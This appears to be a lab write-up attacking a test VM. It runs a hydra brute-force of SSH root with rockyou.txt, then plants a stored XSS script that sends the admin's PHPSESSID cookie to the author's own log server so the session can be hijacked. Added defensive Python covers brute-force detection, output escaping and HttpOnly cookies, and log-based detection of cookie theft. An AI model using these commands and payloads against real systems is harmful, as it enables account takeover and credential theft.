Picking the lowest hanging fruit to crack
- So right now we have two attack vectors:
  - SSH
  - Web service
Cracking ssh
For SSH, we can kick off a password brute-force attempt as a background job.
root@kali:~# locate rockyou
/usr/share/hashcat/masks/rockyou-1-60.hcmask
/usr/share/hashcat/masks/rockyou-2-1800.hcmask
/usr/share/hashcat/masks/rockyou-3-3600.hcmask
/usr/share/hashcat/masks/rockyou-4-43200.hcmask
/usr/share/hashcat/masks/rockyou-5-86400.hcmask
/usr/share/hashcat/masks/rockyou-6-864000.hcmask
/usr/share/hashcat/masks/rockyou-7-2592000.hcmask
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/john/rules/rockyou-30000.rule
/usr/share/wordlists/rockyou.txt.gz
root@kali:~# cd /usr/share/wordlists/
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls -la
total 136660
drwxr-xr-x 2 root root 4096 Nov 5 19:31 .
drwxr-xr-x 338 root root 12288 Oct 24 23:24 ..
lrwxrwxrwx 1 root root 25 Oct 24 23:14 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root 30 Oct 24 23:14 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root 41 Oct 24 23:14 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root 45 Oct 24 23:14 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root 46 Oct 24 23:14 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root 41 Oct 24 23:14 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 139921507 Jul 17 02:59 rockyou.txt
lrwxrwxrwx 1 root root 25 Oct 24 23:14 wfuzz -> /usr/share/wfuzz/wordlist
root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt
root@kali:/usr/share/wordlists# hydra -v -l root -P /usr/share/wordlists/rockyou.txt -t 3 192.168.56.104 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-05 19:33:07
[DATA] max 3 tasks per 1 server, overall 3 tasks, 14344399 login tries (l:1/p:14344399), ~4781467 tries per task
[DATA] attacking ssh://192.168.56.104:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.104:22
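The hydra run above, seen from the target's side: every guess lands as a "Failed password" line in the sshd auth log. The following is an added example, not part of the writeup, that scans such lines and flags any source address that piles up failures inside a short window, which is the simplest detection for this step. The log lines are constructed for the example (OpenSSH's syslog wording as found in /var/log/auth.log on Debian-style hosts), and the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in the syslog style found in /var/log/auth.log; the first
# six are the shape a hydra run against root leaves behind on the target.
SAMPLE_AUTH_LOG = """\
Nov  5 19:33:08 target sshd[2311]: Failed password for root from 192.168.56.101 port 40212 ssh2
Nov  5 19:33:08 target sshd[2312]: Failed password for root from 192.168.56.101 port 40214 ssh2
Nov  5 19:33:09 target sshd[2313]: Failed password for root from 192.168.56.101 port 40216 ssh2
Nov  5 19:33:09 target sshd[2314]: Failed password for root from 192.168.56.101 port 40218 ssh2
Nov  5 19:33:10 target sshd[2315]: Failed password for root from 192.168.56.101 port 40220 ssh2
Nov  5 19:33:10 target sshd[2316]: Failed password for root from 192.168.56.101 port 40222 ssh2
Nov  5 19:40:02 target sshd[2400]: Failed password for alice from 192.168.56.1 port 51000 ssh2
Nov  5 19:40:10 target sshd[2401]: Accepted password for alice from 192.168.56.1 port 51002 ssh2
"""

# Matches OpenSSH's "Failed password" line, including the "invalid user" variant.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)

def parse_failures(log_text, year=2019):
    """Yield (timestamp, user, source_ip) for every failed-password line.
    syslog timestamps carry no year, so the caller supplies it."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]

def find_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sliding-window count of failures per source IP. Returns {ip: peak_count}
    for every source that reached `threshold` failures inside `window_seconds`."""
    per_ip = defaultdict(list)
    for ts, _user, ip in parse_failures(log_text):
        per_ip[ip].append(ts)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it is within window_seconds of times[end].
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged

if __name__ == "__main__":
    for ip, peak in find_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {peak} failed SSH logins inside 60s")
```

On the sample, only 192.168.56.101 crosses the threshold; alice's single typo from 192.168.56.1 does not. The same per-source window is what fail2ban's sshd jail implements, so this is also a quick way to sanity-check a jail's maxretry and findtime against real log data.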
Cracking web service - XSS
Back in our browser, we saw this…
Service recon
In the comment section, there is an XSS vector.
Let's try <script>alert("xss");</script> as the payload.
Got it.
Cracking web service - XSS - stealing user credentials
We can get the credentials through the document.cookie attack vector: the injected script sends the cookie to a log server we control.
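For the two findings above (a comment field that echoes raw HTML, and a session cookie readable from document.cookie), here is an added example of the fixes, not code from the writeup or from the target application. It puts a mirror of the vulnerable renderer beside an escaped one and checks both with the writeup's own probe string, then builds the Set-Cookie line that would have kept PHPSESSID out of script reach. The renderer markup and the comment/author parameters are assumptions; the cookie name is the one seen later in the log.

```python
import html
from http import cookies

# The probe string from the writeup, reused here as test input for both renderers.
PROBE = '<script>alert("xss");</script>'

def render_comment_vulnerable(author, body):
    """Mirror of the flaw the writeup found (assumed markup): user-controlled text is
    concatenated straight into the HTML, so a '<' in a comment opens a real tag."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'

def render_comment_safe(author, body):
    """Hardened renderer: each user-controlled value is entity-encoded for the HTML
    text context it lands in. html.escape turns < > & " ' into entities."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')

def input_survives_as_markup(user_input, rendered):
    """True if the raw input still appears unencoded in the output and contains a tag
    opener, i.e. the browser would parse it as markup rather than text."""
    return "<" in user_input and user_input in rendered

def session_cookie_header(session_id):
    """Set-Cookie line for PHPSESSID with the attributes that take it out of reach of
    document.cookie (HttpOnly) and off cross-site requests (SameSite); Secure keeps
    it off plaintext HTTP. Uses the standard library's cookie serializer."""
    jar = cookies.SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["httponly"] = True
    jar["PHPSESSID"]["secure"] = True
    jar["PHPSESSID"]["samesite"] = "Lax"
    jar["PHPSESSID"]["path"] = "/"
    return jar.output(header="Set-Cookie:")

if __name__ == "__main__":
    print(render_comment_vulnerable("guest", PROBE))  # script tag reaches the page
    print(render_comment_safe("guest", PROBE))        # shown to the reader as literal text
    print(session_cookie_header("example-session-id"))
```

Output encoding is the fix for the injection itself; HttpOnly does not stop the XSS but removes the cookie from what a stolen-cookie script can read, so the img.src trick later in this writeup would have sent an empty string. In PHP the same flag is set with session.cookie_httponly.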
Add access_log /var/log/nginx.log; to the nginx config file, then start the server:
service nginx start
Let's try our log server.
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>
root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"
Success.
Let's inject this sneaky script into our target.
```html
<script>
var img = document.createElement("img");
img.src = "http://192.168.56.101/?cred="+document.cookie;
document.body.appendChild(img);
</script>
```
Wait a bit for the admin to take the bait.
root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"
192.168.56.1 - - [05/Nov/2019:19:55:56 -0800] "GET /?cred=PHPSESSID=e3dk856nao88pv2fokmhkmm9b7 HTTP/1.1" 200 3437 "http://192.168.56.104/post.php?id=2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.104 - - [05/Nov/2019:19:56:05 -0800] "GET /?cred=PHPSESSID=nl65c43q2vfjd77ebebv2dgko1 HTTP/1.1" 200 3437 "http://127.0.0.1/post.php?id=2" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.1 Safari/534.34"
Got it. The second hit, from the PhantomJS client on the target host, is the admin's session: PHPSESSID=nl65c43q2vfjd77ebebv2dgko1
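The same log, read from the defender's side. The following is an added example, not part of the writeup: it parses nginx combined-format lines (the four below are copied from the tail -f output above) and flags any request whose query string carries a session cookie, which is the shape a document.cookie exfiltration leaves in the receiving server's log and, more usefully, in an outbound proxy log or browser telemetry on the victim's network. Each hit keeps the Referer, because that is the page the injected script ran on, i.e. where the stored XSS lives. The SESSION_NAMES list is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Four lines copied from the writeup's tail -f output (nginx "combined" log format).
SAMPLE_ACCESS_LOG = """\
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"
192.168.56.1 - - [05/Nov/2019:19:55:56 -0800] "GET /?cred=PHPSESSID=e3dk856nao88pv2fokmhkmm9b7 HTTP/1.1" 200 3437 "http://192.168.56.104/post.php?id=2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.104 - - [05/Nov/2019:19:56:05 -0800] "GET /?cred=PHPSESSID=nl65c43q2vfjd77ebebv2dgko1 HTTP/1.1" 200 3437 "http://127.0.0.1/post.php?id=2" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.1 Safari/534.34"
"""

# nginx "combined": $remote_addr - $remote_user [$time_local] "$request" $status
#                   $body_bytes_sent "$http_referer" "$http_user_agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Cookie names whose "name=value" showing up inside a query-string value means a
# session was carried out of the browser (assumed list; extend for your stack).
SESSION_NAMES = ("PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "session", "sessionid")

def parse_combined(log_text):
    """Yield one dict per well-formed combined-format line; skip anything else."""
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            yield m.groupdict()

def find_cookie_exfil(log_text):
    """Flag requests where some query parameter's value starts with a known session
    cookie name. parse_qsl splits on the first '=' only, so 'cred=PHPSESSID=abc'
    yields the value 'PHPSESSID=abc' intact."""
    hits = []
    for rec in parse_combined(log_text):
        query = urlsplit(rec["target"]).query
        for _param, value in parse_qsl(query, keep_blank_values=True):
            if any(value.startswith(name + "=") for name in SESSION_NAMES):
                hits.append({"ip": rec["ip"], "time": rec["ts"], "referer": rec["referer"],
                             "leaked": value, "ua": rec["ua"]})
                break
    return hits

if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_ACCESS_LOG):
        print(f'{hit["time"]} {hit["ip"]} leaked {hit["leaked"]} while on {hit["referer"]}')
```

The curl test line (/cred=cookie_here) is not flagged because the token sits in the path, not in a query value; the two real exfiltration hits are, and their Referer points straight at post.php?id=2, the comment that carries the payload. A responder who finds this pattern should invalidate the leaked sessions server-side, not just rotate them on the client.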
Change our cookie to that value with Cookie Editor, and let's try to get into the panel.
Pwned.